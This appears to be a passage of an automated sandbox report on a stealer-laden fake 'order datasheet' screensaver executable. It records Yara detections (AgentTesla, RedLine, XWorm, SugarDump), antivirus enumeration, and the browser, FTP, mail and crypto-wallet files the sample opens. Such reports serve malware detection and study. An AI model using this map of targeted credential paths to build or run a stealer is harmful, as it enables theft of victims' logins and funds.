Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe	Queries volume information: C:\Users\user\AppData\Roaming\XClient.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe	Queries volume information: C:\Users\user\AppData\Roaming\XClient.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation

Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe

Code function: 0_2_00007FF7BD5FEB00 GetSystemTimeAsFileTime,

0_2_00007FF7BD5FEB00

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: RegSvcs.exe, 00000003.00000002.1977732940.0000000006403000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1942873699.0000000000D39000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 3.2.RegSvcs.exe.7330000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.73c0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.73c0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.7330000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1983688526.00000000073C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1982834712.0000000007330000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6648, type: MEMORYSTR

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 3.2.RegSvcs.exe.7ab0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.7ab0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1992384164.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6648, type: MEMORYSTR

Yara detected SugarDump

Source: Yara match	File source: 3.2.RegSvcs.exe.7cf0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.7cf0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1995905979.0000000007CF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6648, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: 0.2.ORDERDATASHEET#PO8738763.scr.exe.1e853c264f8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDERDATASHEET#PO8738763.scr.exe.1e853c264f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDERDATASHEET#PO8738763.scr.exe.1e8577f5438.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ORDERDATASHEET#PO8738763.scr.exe.1e8577f5438.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1646069064.000001E853C1F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1940827360.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1948750396.0000000002961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1646490262.000001E856E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ORDERDATASHEET#PO8738763.scr.exe PID: 3272, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6648, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ElectrumE#
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: JaxxE#
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ExodusE#
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: EthereumE#
Source: powershell.exe, 00000004.00000002.1696914668.0000000005FB6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\atomic\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior

Source: Yara match	File source: 3.2.RegSvcs.exe.7330000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.73c0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.73c0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.7330000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1983688526.00000000073C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1982834712.0000000007330000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6648, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 3.2.RegSvcs.exe.7330000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.73c0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.73c0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.7330000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1983688526.00000000073C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1982834712.0000000007330000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6648, type: MEMORYSTR

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
